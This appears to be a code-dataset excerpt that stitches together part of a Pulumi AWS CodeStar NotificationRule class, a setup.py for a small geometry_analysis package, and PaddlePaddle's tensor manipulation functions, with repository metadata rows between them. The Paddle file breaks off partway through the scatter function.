raise TypeError("Missing required property 'resource'")
__props__['resource'] = resource
__props__['status'] = status
__props__['tags'] = tags
__props__['targets'] = targets
__props__['arn'] = None
super(NotificationRule, __self__).__init__(
'aws:codestarnotifications/notificationRule:NotificationRule',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name, id, opts=None, arn=None, detail_type=None, event_type_ids=None, name=None, resource=None, status=None, tags=None, targets=None):
"""
Get an existing NotificationRule resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param str id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] arn: The codestar notification rule ARN.
:param pulumi.Input[str] detail_type: The level of detail to include in the notifications for this resource. Possible values are `BASIC` and `FULL`.
:param pulumi.Input[list] event_type_ids: A list of event types associated with this notification rule.
For list of allowed events see [here](https://docs.aws.amazon.com/codestar-notifications/latest/userguide/concepts.html#concepts-api).
:param pulumi.Input[str] name: The name of notification rule.
:param pulumi.Input[str] resource: The ARN of the resource to associate with the notification rule.
:param pulumi.Input[str] status: The status of the notification rule. Possible values are `ENABLED` and `DISABLED`, default is `ENABLED`.
:param pulumi.Input[dict] tags: A map of tags to assign to the resource.
:param pulumi.Input[list] targets: Configuration blocks containing notification target information. Can be specified multiple times. At least one target must be specified on creation.
The **targets** object supports the following:
* `address` (`pulumi.Input[str]`) - The ARN of notification rule target. For example, a SNS Topic ARN.
* `status` (`pulumi.Input[str]`) - The status of the notification rule. Possible values are `ENABLED` and `DISABLED`, default is `ENABLED`.
* `type` (`pulumi.Input[str]`) - The type of the notification target. Default value is `SNS`.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = dict()
__props__["arn"] = arn
__props__["detail_type"] = detail_type
__props__["event_type_ids"] = event_type_ids
__props__["name"] = name
__props__["resource"] = resource
__props__["status"] = status
__props__["tags"] = tags
__props__["targets"] = targets
return NotificationRule(resource_name, opts=opts, __props__=__props__)
def translate_output_property(self, prop):
return tables._CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
def translate_input_property(self, prop):
return tables._SNAKE_TO_CAMEL_CASE_TABLE.get(prop) or prop
| 51.016667
| 202
| 0.663182
|
4a01f7842476d7c7862fe908d9e333dc4bd726a3
| 2,214
|
py
|
Python
|
setup.py
|
MadisonB14/geometry_analysis
|
69ce485c5c0ecdfd3202aa8a0290bc2fdc43f743
|
[
"BSD-3-Clause"
] | null | null | null |
setup.py
|
MadisonB14/geometry_analysis
|
69ce485c5c0ecdfd3202aa8a0290bc2fdc43f743
|
[
"BSD-3-Clause"
] | null | null | null |
setup.py
|
MadisonB14/geometry_analysis
|
69ce485c5c0ecdfd3202aa8a0290bc2fdc43f743
|
[
"BSD-3-Clause"
] | null | null | null |
"""
geometry_analysis
A python package for the MolSSSI Software Summer School.
"""
import sys
from setuptools import setup, find_packages
import versioneer
short_description = __doc__.split("\n")
# from https://github.com/pytest-dev/pytest-runner#conditional-requirement
needs_pytest = {'pytest', 'test', 'ptr'}.intersection(sys.argv)
pytest_runner = ['pytest-runner'] if needs_pytest else []
try:
with open("README.md", "r") as handle:
long_description = handle.read()
except:
long_description = "\n".join(short_description[2:]),
setup(
# Self-descriptive entries which should always be present
name='geometry_analysis',
author='Madison_Berger',
author_email='madisonberger14@hotmail.com',
description=short_description[0],
long_description=long_description,
long_description_content_type="text/markdown",
version=versioneer.get_version(),
cmdclass=versioneer.get_cmdclass(),
license='BSD-3-Clause',
# Which Python importable modules should be included when your package is installed
# Handled automatically by setuptools. Use 'exclude' to prevent some specific
# subpackage(s) from being added, if needed
packages=find_packages(),
# Optional include package data to ship with your package
# Customize MANIFEST.in if the general case does not suit your needs
# Comment out this line to prevent the files from being packaged with your software
include_package_data=True,
# Allows `setup.py test` to work correctly with pytest
setup_requires=[] + pytest_runner,
# Additional entries you may want simply uncomment the lines you want and fill in the data
# url='http://www.my_package.com', # Website
# install_requires=[], # Required packages, pulls from pip if needed; do not use for Conda deployment
# platforms=['Linux',
# 'Mac OS-X',
# 'Unix',
# 'Windows'], # Valid platforms your code works on, adjust to your flavor
# python_requires=">=3.5", # Python version restrictions
# Manual control if final package is compressible or not, set False to prevent the .egg from being made
# zip_safe=False,
)
| 36.9
| 118
| 0.703704
|
4a01f7e7fa311e0a5a52aa8c79e3859f7bb2f8da
| 58,406
|
py
|
Python
|
python/paddle/tensor/manipulation.py
|
Qengineering/Paddle
|
6453ff055555e17c23727599663092c8a835ce9d
|
[
"Apache-2.0"
] | null | null | null |
python/paddle/tensor/manipulation.py
|
Qengineering/Paddle
|
6453ff055555e17c23727599663092c8a835ce9d
|
[
"Apache-2.0"
] | null | null | null |
python/paddle/tensor/manipulation.py
|
Qengineering/Paddle
|
6453ff055555e17c23727599663092c8a835ce9d
|
[
"Apache-2.0"
] | 1
|
2021-03-23T00:59:48.000Z
|
2021-03-23T00:59:48.000Z
|
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
from ..fluid.layers import core
from ..fluid.layer_helper import LayerHelper
from ..fluid.framework import Variable, OpProtoHolder, in_dygraph_mode, convert_np_dtype_to_dtype_, device_guard
from ..fluid.data_feeder import convert_dtype, check_variable_and_dtype, check_type, check_dtype
from ..fluid.layers.tensor import fill_constant
from ..fluid.layers import utils
import numpy as np
import six
# TODO: define functions to manipulate a tensor
from ..fluid.layers import cast #DEFINE_ALIAS
from ..fluid.layers import slice #DEFINE_ALIAS
from ..fluid.layers import transpose #DEFINE_ALIAS
from ..fluid.layers import unstack #DEFINE_ALIAS
from ..fluid.layers import scatter_nd #DEFINE_ALIAS
from ..fluid.layers import shard_index #DEFINE_ALIAS
from ..fluid import layers
import paddle
__all__ = [
'cast',
'concat',
'expand',
'broadcast_to',
'expand_as',
'flatten',
'gather',
'gather_nd',
'reshape',
'reverse',
'scatter',
'scatter_nd_add',
'scatter_nd',
'shard_index',
'slice',
'split',
'chunk',
'squeeze',
'stack',
'strided_slice',
'transpose',
'unique',
'unsqueeze',
'unstack',
'flip',
'unbind',
'roll',
'tile',
]
def concat(x, axis=0, name=None):
"""
This OP concatenates the input along the axis.
Args:
x(list|tuple): ``x`` is a Tensor list or Tensor tuple which is with data type bool, float16,
float32, float64, int32, int64. All the Tensors in ``x`` must have same data type.
axis(int|Tensor, optional): Specify the axis to operate on the input Tensors.
It's a scalar with data type int or a Tensor with shape [1] and data type int32
or int64. The effective range is [-R, R), where R is Rank(x). When ``axis < 0``,
it works the same way as ``axis+R``. Default is 0.
name (str, optional): The default value is None. Normally there is no
need for user to set this property. For more information, please
refer to :ref:`api_guide_Name`.
Returns:
Tensor: A Tensor with the same data type as ``x``.
Examples:
.. code-block:: python
import paddle
x1 = paddle.to_tensor([[1, 2, 3],
[4, 5, 6]])
x2 = paddle.to_tensor([[11, 12, 13],
[14, 15, 16]])
x3 = paddle.to_tensor([[21, 22],
[23, 24]])
zero = paddle.full(shape=[1], dtype='int32', fill_value=0)
# When the axis is negative, the real axis is (axis + Rank(x))
# As follow, axis is -1, Rank(x) is 2, the real axis is 1
out1 = paddle.concat(x=[x1, x2, x3], axis=-1)
out2 = paddle.concat(x=[x1, x2], axis=0)
out3 = paddle.concat(x=[x1, x2], axis=zero)
# out1
# [[ 1 2 3 11 12 13 21 22]
# [ 4 5 6 14 15 16 23 24]]
# out2 out3
# [[ 1 2 3]
# [ 4 5 6]
# [11 12 13]
# [14 15 16]]
"""
check_type(x, 'x', (list, tuple), 'concat')
return paddle.fluid.layers.concat(input=x, axis=axis, name=name)
def flip(x, axis, name=None):
"""
:alias_main: paddle.flip
:alias: paddle.flip,paddle.tensor.flip,paddle.tensor.manipulation.flip
Reverse the order of a n-D tensor along given axis in axis.
Args:
x (Variable): A Tensor(or LoDTensor) with shape :math:`[N_1, N_2,..., N_k]` . The data type of the input Tensor x
should be float32, float64, int32, int64, bool.
axis (list): The axis(axes) to flip on. Negative indices for indexing from the end are accepted.
name (str, optional): The default value is None. Normally there is no need for user to set this property.
For more information, please refer to :ref:`api_guide_Name` .
Returns:
Variable: Tensor or LoDTensor calculated by flip layer. The data type is same with input x.
Examples:
.. code-block:: python
import paddle
import numpy as np
paddle.disable_static()
image_shape=(3, 2, 2)
x = np.arange(image_shape[0] * image_shape[1] * image_shape[2]).reshape(image_shape)
x = x.astype('float32')
img = paddle.to_tensor(x)
out = paddle.flip(img, [0,1])
print(out) # [[[10,11][8, 9]],[[6, 7],[4, 5]] [[2, 3],[0, 1]]]
"""
helper = LayerHelper("flip", **locals())
check_type(x, 'X', (Variable), 'flip')
dtype = helper.input_dtype('x')
check_dtype(dtype, 'X',
['float16', 'float32', 'float64', 'int32', 'int64', 'bool'],
'flip')
check_type(axis, 'axis', (list, tuple), 'flip')
if name is None:
out = helper.create_variable_for_type_inference(dtype)
else:
out = helper.create_variable(name=name, dtype=dtype, persistable=False)
helper.append_op(
type="flip",
inputs={"X": x},
outputs={"Out": out},
attrs={"axis": axis})
return out
def flatten(x, start_axis=0, stop_axis=-1, name=None):
"""
**Flatten op**
Flattens a contiguous range of axes in a tensor according to start_axis and stop_axis.
For Example:
.. code-block:: text
Case 1:
Given
X.shape = (3, 100, 100, 4)
and
start_axis = 1
end_axis = 2
We get:
Out.shape = (3, 1000 * 100, 2)
Case 2:
Given
X.shape = (3, 100, 100, 4)
and
start_axis = 0
stop_axis = -1
We get:
Out.shape = (3 * 100 * 100 * 4)
Args:
x (Tensor): A tensor of number of dimentions >= axis. A tensor with data type float32,
float64, int8, int32, int64.
start_axis (int): the start axis to flatten
stop_axis (int): the stop axis to flatten
name(str, Optional): For details, please refer to :ref:`api_guide_Name`.
Generally, no setting is required. Default: None.
Returns:
Tensor: A tensor with the contents of the input tensor, with input \
axes flattened by indicated start axis and end axis. \
A Tensor with data type same as input x.
Raises:
ValueError: If x is not a Tensor.
ValueError: If start_axis or stop_axis is illegal.
Examples:
.. code-block:: python
import paddle
image_shape=(2, 3, 4, 4)
x = paddle.arange(end=image_shape[0] * image_shape[1] * image_shape[2] * image_shape[3])
img = paddle.reshape(x, image_shape)
out = paddle.flatten(img, start_axis=1, stop_axis=2)
# out shape is [2, 12, 4]
"""
if not (isinstance(x, Variable)):
raise ValueError("The input x should be a Tensor")
check_variable_and_dtype(
x, 'x', ['float32', 'float64', 'int8', 'int32', 'int64'], 'flatten')
helper = LayerHelper('flatten', **locals())
x_dim = len(x.shape)
if not (isinstance(start_axis, int)) or (
start_axis > x_dim - 1) or start_axis < -x_dim:
raise ValueError(
"The start_axis should be a int, and in range [-rank(x), rank(x))")
if not (isinstance(stop_axis, int)) or (
stop_axis > x_dim - 1) or stop_axis < -x_dim:
raise ValueError(
"The stop_axis should be a int, and in range [-rank(x), rank(x))")
if start_axis < 0:
start_axis = start_axis + x_dim
if stop_axis < 0:
stop_axis = stop_axis + x_dim
if start_axis > stop_axis:
raise ValueError("The stop_axis should be larger than stat_axis")
if in_dygraph_mode():
dy_out, _ = core.ops.flatten_contiguous_range(
x, 'start_axis', start_axis, 'stop_axis', stop_axis)
return dy_out
out = helper.create_variable_for_type_inference(x.dtype)
x_shape = helper.create_variable_for_type_inference(x.dtype)
helper.append_op(
type='flatten_contiguous_range',
inputs={"X": x},
outputs={'Out': out,
'XShape': x_shape},
attrs={"start_axis": start_axis,
"stop_axis": stop_axis})
return out
def roll(x, shifts, axis=None, name=None):
"""
:alias_main: paddle.roll
:alias: paddle.roll,paddle.tensor.roll,paddle.tensor.manipulation.roll
Roll the `x` tensor along the given axis(axes). With specific 'shifts', Elements that
roll beyond the last position are re-introduced at the first according to 'shifts'.
If a axis is not specified,
the tensor will be flattened before rolling and then restored to the original shape.
Args:
x (Tensor): The x tensor variable as input.
shifts (int|list|tuple): The number of places by which the elements
of the `x` tensor are shifted.
axis (int|list|tuple|None): axis(axes) along which to roll.
Returns:
Tensor: A Tensor with same data type as `x`.
Examples:
.. code-block:: python
import paddle
x = paddle.to_tensor([[1.0, 2.0, 3.0],
[4.0, 5.0, 6.0],
[7.0, 8.0, 9.0]])
out_z1 = paddle.roll(x, shifts=1)
print(out_z1.numpy())
#[[9. 1. 2.]
# [3. 4. 5.]
# [6. 7. 8.]]
out_z2 = paddle.roll(x, shifts=1, axis=0)
print(out_z2.numpy())
#[[7. 8. 9.]
# [1. 2. 3.]
# [4. 5. 6.]]
"""
helper = LayerHelper("roll", **locals())
origin_shape = x.shape
if type(shifts) == int:
shifts = [shifts]
if type(axis) == int:
axis = [axis]
len_origin_shape = len(origin_shape)
if axis:
for i in range(len(axis)):
if axis[i] >= len_origin_shape or axis[i] < -len_origin_shape:
raise ValueError(
"axis is out of range, it should be in range [{}, {}), but received {}".
format(-len_origin_shape, len_origin_shape, axis))
if axis:
check_type(axis, 'axis', (list, tuple), 'roll')
check_type(shifts, 'shifts', (list, tuple), 'roll')
if in_dygraph_mode():
if axis is None:
x = core.ops.reshape(x, 'shape', [-1, 1])
axis = [0]
out = core.ops.roll(x, 'axis', axis, 'shifts', shifts)
return core.ops.reshape(out, 'shape', origin_shape)
out = helper.create_variable_for_type_inference(x.dtype)
if axis is None:
x = reshape(x, shape=[-1, 1])
axis = [0]
helper.append_op(
type='roll',
inputs={'X': x},
outputs={'Out': out},
attrs={'axis': axis,
'shifts': shifts})
out = layers.reshape(out, shape=origin_shape)
return out
def stack(x, axis=0, name=None):
"""
:alias_main: paddle.stack
:alias: paddle.stack, paddle.tensor.stack, paddle.tensor.manipulation.stack
This OP stacks all the input tensors ``x`` along ``axis`` dimemsion.
All tensors must be of the same shape and same dtype.
For example, given N tensors of shape [A, B], if ``axis == 0``, the shape of stacked
tensor is [N, A, B]; if ``axis == 1``, the shape of stacked
tensor is [A, N, B], etc.
.. code-block:: text
Case 1:
Input:
x[0].shape = [1, 2]
x[0].data = [ [1.0 , 2.0 ] ]
x[1].shape = [1, 2]
x[1].data = [ [3.0 , 4.0 ] ]
x[2].shape = [1, 2]
x[2].data = [ [5.0 , 6.0 ] ]
Attrs:
axis = 0
Output:
Out.dims = [3, 1, 2]
Out.data =[ [ [1.0, 2.0] ],
[ [3.0, 4.0] ],
[ [5.0, 6.0] ] ]
Case 2:
Input:
x[0].shape = [1, 2]
x[0].data = [ [1.0 , 2.0 ] ]
x[1].shape = [1, 2]
x[1].data = [ [3.0 , 4.0 ] ]
x[2].shape = [1, 2]
x[2].data = [ [5.0 , 6.0 ] ]
Attrs:
axis = 1 or axis = -2 # If axis = -2, axis = axis+ndim(x[0])+1 = -2+2+1 = 1.
Output:
Out.shape = [1, 3, 2]
Out.data =[ [ [1.0, 2.0]
[3.0, 4.0]
[5.0, 6.0] ] ]
Args:
x (list[Tensor]|tuple[Tensor]): Input ``x`` can be a ``list`` or ``tuple`` of tensors, the Tensors in ``x``
must be of the same shape and dtype. Supported data types: float32, float64, int32, int64.
axis (int, optional): The axis along which all inputs are stacked. ``axis`` range is ``[-(R+1), R+1)``,
where ``R`` is the number of dimensions of the first input tensor ``x[0]``.
If ``axis < 0``, ``axis = axis+R+1``. The default value of axis is 0.
name (str, optional): Please refer to :ref:`api_guide_Name`, Default None.
Returns:
Tensor: The stacked tensor with same data type as input.
Example:
.. code-block:: python
import paddle
paddle.disable_static()
x1 = paddle.to_tensor([[1.0, 2.0]])
x2 = paddle.to_tensor([[3.0, 4.0]])
x3 = paddle.to_tensor([[5.0, 6.0]])
out = paddle.stack([x1, x2, x3], axis=0)
print(out.shape) # [3, 1, 2]
print(out.numpy())
# [[[1., 2.]],
# [[3., 4.]],
# [[5., 6.]]]
"""
return layers.stack(x, axis, name)
def split(x, num_or_sections, axis=0, name=None):
"""
Split the input tensor into multiple sub-Tensors.
Args:
x (Tensor): A N-D Tensor. The data type is bool, float16, float32, float64, int32 or int64.
num_or_sections (int|list|tuple): If ``num_or_sections`` is an int, then ``num_or_sections``
indicates the number of equal sized sub-Tensors that the ``x`` will be divided into.
If ``num_or_sections`` is a list or tuple, the length of it indicates the number of
sub-Tensors and the elements in it indicate the sizes of sub-Tensors' dimension orderly.
The length of the list must not be larger than the ``x`` 's size of specified ``axis``.
axis (int|Tensor, optional): The axis along which to split, it can be a scalar with type
``int`` or a ``Tensor`` with shape [1] and data type ``int32`` or ``int64``.
If :math::`axis < 0`, the axis to split along is :math:`rank(x) + axis`. Default is 0.
name (str, optional): The default value is None. Normally there is no need for user to set this property.
For more information, please refer to :ref:`api_guide_Name` .
Returns:
list(Tensor): The list of segmented Tensors.
Example:
.. code-block:: python
import numpy as np
import paddle
# x is a Tensor which shape is [3, 9, 5]
x_np = np.random.random([3, 9, 5]).astype("int32")
x = paddle.to_tensor(x_np)
out0, out1, out22 = paddle.split(x, num_or_sections=3, axis=1)
# out0.shape [3, 3, 5]
# out1.shape [3, 3, 5]
# out2.shape [3, 3, 5]
out0, out1, out2 = paddle.split(x, num_or_sections=[2, 3, 4], axis=1)
# out0.shape [3, 2, 5]
# out1.shape [3, 3, 5]
# out2.shape [3, 4, 5]
out0, out1, out2 = paddle.split(x, num_or_sections=[2, 3, -1], axis=1)
# out0.shape [3, 2, 5]
# out1.shape [3, 3, 5]
# out2.shape [3, 4, 5]
# axis is negative, the real axis is (rank(x) + axis) which real
# value is 1.
out0, out1, out2 = paddle.split(x, num_or_sections=3, axis=-2)
# out0.shape [3, 3, 5]
# out1.shape [3, 3, 5]
# out2.shape [3, 3, 5]
"""
return paddle.fluid.layers.split(
input=x, num_or_sections=num_or_sections, dim=axis, name=name)
def squeeze(x, axis=None, name=None):
"""
:alias_main: paddle.squeeze
:alias: paddle.squeeze, paddle.tensor.squeeze, paddle.tensor.manipulation.squeeze
This OP will squeeze the dimension(s) of size 1 of input tensor x's shape.
If axis is provided, it will remove the dimension(s) by given axis that of size 1.
If the dimension of given axis is not of size 1, the dimension remain unchanged.
If axis is not provided, all dims equal of size 1 will be removed.
.. code-block:: text
Case1:
Input:
x.shape = [1, 3, 1, 5] # If axis is not provided, all dims equal of size 1 will be removed.
axis = None
Output:
out.shape = [3, 5]
Case2:
Input:
x.shape = [1, 3, 1, 5] # If axis is provided, it will remove the dimension(s) by given axis that of size 1.
axis = 0
Output:
out.shape = [3, 1, 5]
Case4:
Input:
x.shape = [1, 3, 1, 5] # If the dimension of one given axis (3) is not of size 1, the dimension remain unchanged.
axis = [0, 2, 3]
Output:
out.shape = [3, 5]
Case4:
Input:
x.shape = [1, 3, 1, 5] # If axis is negative, axis = axis + ndim (number of dimensions in x).
axis = [-2]
Output:
out.shape = [1, 3, 5]
Args:
x (Tensor): The input Tensor. Supported data type: float32, float64, bool, int8, int32, int64.
axis (int|list|tuple, optional): An integer or list of integers, indicating the dimensions to be squeezed. Default is None.
The range of axis is :math:`[-ndim(x), ndim(x))`.
If axis is negative, :math:`axis = axis + ndim(x)`.
If axis is None, all the dimensions of x of size 1 will be removed.
name (str, optional): Please refer to :ref:`api_guide_Name`, Default None.
Returns:
Tensor: Squeezed Tensor with the same data type as input Tensor.
Examples:
.. code-block:: python
import paddle
paddle.disable_static()
x = paddle.rand([5, 1, 10])
output = paddle.squeeze(x, axis=1)
# output.shape [5, 10]
"""
if axis is None:
axis = []
elif isinstance(axis, int):
axis = [axis]
elif isinstance(axis, tuple):
axis = list(axis)
return layers.squeeze(x, axis, name)
def unique(x,
return_index=False,
return_inverse=False,
return_counts=False,
axis=None,
dtype="int64",
name=None):
"""
Returns the unique elements of `x` in ascending order.
Args:
x(Tensor): The input tensor, it's data type should be float32, float64, int32, int64.
return_index(bool, optional): If True, also return the indices of the input tensor that
result in the unique Tensor.
return_inverse(bool, optional): If True, also return the indices for where elements in
the original input ended up in the returned unique tensor.
return_counts(bool, optional): If True, also return the counts for each unique element.
axis(int, optional): The axis to apply unique. If None, the input will be flattened.
Default: None.
dtype(np.dtype|str, optional): The date type of `indices` or `inverse` tensor: int32 or int64.
Default: int64.
name(str, optional): Name for the operation. For more information, please refer to
:ref:`api_guide_Name`. Default: None.
Returns:
tuple: (out, indices, inverse, counts). `out` is the unique tensor for `x`. `indices` is \
provided only if `return_index` is True. `inverse` is provided only if `return_inverse` \
is True. `counts` is provided only if `return_counts` is True.
Examples:
.. code-block:: python
import paddle
x = paddle.to_tensor([2, 3, 3, 1, 5, 3])
unique = paddle.unique(x)
np_unique = unique.numpy() # [1 2 3 5]
_, indices, inverse, counts = paddle.unique(x, return_index=True, return_inverse=True, return_counts=True)
np_indices = indices.numpy() # [3 0 1 4]
np_inverse = inverse.numpy() # [1 2 2 0 3 2]
np_counts = counts.numpy() # [1 1 3 1]
x = paddle.to_tensor([[2, 1, 3], [3, 0, 1], [2, 1, 3]])
unique = paddle.unique(x)
np_unique = unique.numpy() # [0 1 2 3]
unique = paddle.unique(x, axis=0)
np_unique = unique.numpy()
# [[2 1 3]
# [3 0 1]]
"""
if axis is None:
axis = []
else:
axis = [axis]
attr_dtype = convert_np_dtype_to_dtype_(dtype)
if in_dygraph_mode():
out, inverse, indices, counts = core.ops.unique(
x, 'dtype', attr_dtype, 'return_index', return_index,
'return_inverse', return_inverse, 'return_counts', return_counts,
'axis', axis, "is_sorted", True)
outs = [out]
if return_index:
outs.append(indices)
if return_inverse:
outs.append(inverse)
if return_counts:
outs.append(counts)
if len(outs) == 1:
return outs[0]
return tuple(outs)
check_variable_and_dtype(x, "input",
['float32', 'float64', 'int32', 'int64'], 'unique')
check_type(return_index, 'return_index', bool, 'unique')
check_type(return_inverse, 'return_inverse', bool, 'unique')
check_type(return_counts, 'return_counts', bool, 'unique')
check_dtype(dtype, 'dtype', ['int32', 'int64'], 'unique')
if len(axis) != 0:
check_type(axis[0], 'axis', int, 'unique')
helper = LayerHelper('unique', **locals())
attrs = {
'dtype': attr_dtype,
"return_index": return_index,
"return_inverse": return_inverse,
"return_counts": return_counts,
"axis": axis,
"is_sorted": True
}
out = helper.create_variable_for_type_inference(
dtype=x.dtype, stop_gradient=True)
indices = helper.create_variable_for_type_inference(
dtype=attr_dtype, stop_gradient=True)
inverse = helper.create_variable_for_type_inference(
dtype=attr_dtype, stop_gradient=True)
counts = helper.create_variable_for_type_inference(
dtype=attr_dtype, stop_gradient=True)
outputs = {
"Out": out,
"Indices": indices,
"Index": inverse,
"Counts": counts
}
outs = [out]
if return_index:
outs.append(indices)
if return_inverse:
outs.append(inverse)
if return_counts:
outs.append(counts)
helper.append_op(
type="unique", inputs={"X": x}, attrs=attrs, outputs=outputs)
if len(outs) == 1:
return outs[0]
return tuple(outs)
def unsqueeze(x, axis, name=None):
"""
:alias_main: paddle.unsqueeze
:alias: paddle.unsqueeze, paddle.tensor.unsqueeze, paddle.tensor.manipulation.unsqueeze
Insert single-dimensional entries to the shape of input Tensor ``x``. Takes one
required argument axis, a dimension or list of dimensions that will be inserted.
Dimension indices in axis are as seen in the output tensor.
Args:
x (Tensor): The input Tensor to be unsqueezed. Supported data type: float32, float64, bool, int8, int32, int64.
axis (int|list|tuple|Tensor): Indicates the dimensions to be inserted. The data type is ``int32`` .
If ``axis`` is a list or tuple, the elements of it should be integers or Tensors with shape [1].
If ``axis`` is a Tensor, it should be an 1-D Tensor .
If ``axis`` is negative, ``axis = axis + ndim(x) + 1``.
name (str|None): Name for this layer. Please refer to :ref:`api_guide_Name`, Default None.
Returns:
Tensor: Unsqueezed Tensor with the same data type as input Tensor.
Examples:
.. code-block:: python
import paddle
paddle.disable_static()
x = paddle.rand([5, 10])
print(x.shape) # [5, 10]
out1 = paddle.unsqueeze(x, axis=0)
print(out1.shape) # [1, 5, 10]
out2 = paddle.unsqueeze(x, axis=[0, 2])
print(out2.shape) # [1, 5, 1, 10]
axis = paddle.fluid.dygraph.to_variable([0, 1, 2])
out3 = paddle.unsqueeze(x, axis=axis)
print(out3.shape) # [1, 1, 1, 5, 10]
"""
return layers.unsqueeze(x, axis, name)
def gather(x, index, axis=None, name=None):
"""
Output is obtained by gathering entries of ``axis``
of ``x`` indexed by ``index`` and concatenate them together.
.. code-block:: text
Given:
x = [[1, 2],
[3, 4],
[5, 6]]
index = [1, 2]
axis=[0]
Then:
out = [[3, 4],
[5, 6]]
Args:
x (Tensor): The source input tensor with rank>=1. Supported data type is
int32, int64, float32, float64 and uint8 (only for CPU),
float16 (only for GPU).
index (Tensor): The index input tensor with rank=1. Data type is int32 or int64.
axis (Tensor|int, optional): The axis of input to be gathered, it's can be int or a Tensor with data type is int32 or int64. The default value is None, if None, the ``axis`` is 0.
name (str, optional): The default value is None. Normally there is no need for user to set this property.
For more information, please refer to :ref:`api_guide_Name` .
Returns:
output (Tensor): The output is a tensor with the same rank as ``x``.
Examples:
.. code-block:: python
import paddle
input = paddle.to_tensor([[1,2],[3,4],[5,6]])
index = paddle.to_tensor([0,1])
output = paddle.gather(input, index, axis=0)
# expected output: [[1,2],[3,4]]
"""
if axis is None:
axis = 0
axis_tensor = axis
if not isinstance(axis, Variable):
with device_guard("cpu"):
axis_tensor = fill_constant(shape=[1], dtype='int64', value=axis)
if in_dygraph_mode():
return core.ops.gather(x, index, axis_tensor)
check_variable_and_dtype(
x, 'x', ['float16', 'float32', 'float64', 'int32', 'int64', 'uint8'],
'gather')
check_variable_and_dtype(index, 'index', ['int32', 'int64'], 'gather')
if isinstance(axis, Variable):
check_variable_and_dtype(axis, 'axis', ['int32', 'int64'], 'gather')
else:
check_type(axis, 'axis', (int), 'gather')
helper = LayerHelper('gather', **locals())
dtype = helper.input_dtype()
out = helper.create_variable_for_type_inference(dtype)
helper.append_op(
type="gather",
inputs={"X": x,
"Index": index,
"Axis": axis_tensor},
outputs={"Out": out})
return out
def unbind(input, axis=0):
"""
:alias_main: paddle.tensor.unbind
:alias: paddle.tensor.unbind,paddle.tensor.manipulation.unbind
Removes a tensor dimension, then split the input tensor into multiple sub-Tensors.
Args:
input (Variable): The input variable which is an N-D Tensor, data type being float32, float64, int32 or int64.
axis (int32|int64, optional): A scalar with type ``int32|int64`` shape [1]. The dimension along which to unbind. If :math:`axis < 0`, the
dimension to unbind along is :math:`rank(input) + axis`. Default is 0.
Returns:
list(Variable): The list of segmented Tensor variables.
Example:
.. code-block:: python
import paddle
# input is a variable which shape is [3, 4, 5]
input = paddle.fluid.data(
name="input", shape=[3, 4, 5], dtype="float32")
[x0, x1, x2] = paddle.tensor.unbind(input, axis=0)
# x0.shape [4, 5]
# x1.shape [4, 5]
# x2.shape [4, 5]
[x0, x1, x2, x3] = paddle.tensor.unbind(input, axis=1)
# x0.shape [3, 5]
# x1.shape [3, 5]
# x2.shape [3, 5]
# x3.shape [3, 5]
"""
helper = LayerHelper("unbind", **locals())
check_type(input, 'input', (Variable), 'unbind')
dtype = helper.input_dtype()
check_dtype(dtype, 'unbind', ['float32', 'float64', 'int32', 'int64'],
'unbind')
if not isinstance(axis, (int)):
raise TypeError("The type of 'axis' must be int, but received %s." %
(type(axis)))
if isinstance(axis, np.generic):
axis = np.asscalar(axis)
input_shape = input.shape
axis_ = axis if axis >= 0 else len(input_shape) + axis
num = input_shape[axis_]
outs = [
helper.create_variable_for_type_inference(dtype=helper.input_dtype())
for i in range(num)
]
helper.append_op(
type="unbind",
inputs={"X": input},
outputs={"Out": outs},
attrs={"axis": axis})
return outs
def scatter(x, index, updates, overwrite=True, name=None):
"""
**Scatter Layer**
Output is obtained by updating the input on selected indices based on updates.
.. code-block:: python
import numpy as np
#input:
x = np.array([[1, 1], [2, 2], [3, 3]])
index = np.array([2, 1, 0, 1])
# shape of updates should be the same as x
# shape of updates with dim > 1 should be the same as input
updates = np.array([[1, 1], [2, 2], [3, 3], [4, 4]])
overwrite = False
# calculation:
if not overwrite:
for i in range(len(index)):
x[index[i]] = np.zeros((2))
for i in range(len(index)):
if (overwrite):
x[index[i]] = updates[i]
else:
x[index[i]] += updates[i]
# output:
out = np.array([[3, 3], [6, 6], [1, 1]])
out.shape # [3, 2]
**NOTICE**: The order in which updates are applied is nondeterministic,
so the output will be nondeterministic if index contains duplicates.
Args:
x (Tensor): The input N-D Tensor with ndim>=1. Data type can be float32, float64.
index (Tensor): The index 1-D Tensor. Data type can be int32, int64. The length of index cannot exceed updates's length, and the value in index cannot exceed input's length.
updates (Tensor): update input with updates parameter based on index. shape should be the same as input, and dim value with dim > 1 should be the same as input.
overwrite (bool): The mode that updating the output when there are same indices.
If True, use the overwrite mode to update the output of the same index,
if False, use the accumulate mode to update the output of the same index.Default value is True.
name(str, optional): The default value is None. Normally there is no need for user to set this property. For more information, please refer to :ref:`api_guide_Name` .
Returns:
Tensor: The output is a Tensor with the same shape as x.
Examples:
.. code-block:: python
import paddle
paddle.disable_static()
x = paddle.to_tensor([[1, 1], [2, 2], [3, 3]], dtype='float32')
index = paddle.to_tensor([2, 1, 0, 1], dtype='int64')
updates = paddle.to_tensor([[1, 1], [2, 2], [3, 3], [4, 4]], dtype='float32')
output1 = paddle.scatter(x, index, updates, overwrite=False)
# [[3., 3.],
# [6., 6.],
# [1., 1.]]
output2 = paddle.scatter(x, index, updates, overwrite=True)
# CPU device:
# [[3., 3.],
# [4., 4.],
# [1., 1.]]
# GPU device maybe have two results because of the repeated numbers in index
# result 1:
# [[3., 3.],
# [4., 4.],
# [1., 1.]]
# result 2:
# [[3., 3.],
# [2., 2.],
# [1., 1.]]
"""
if in_dygraph_mode():
return core.ops.scatter(x, index, updates, 'overwrite', overwrite)
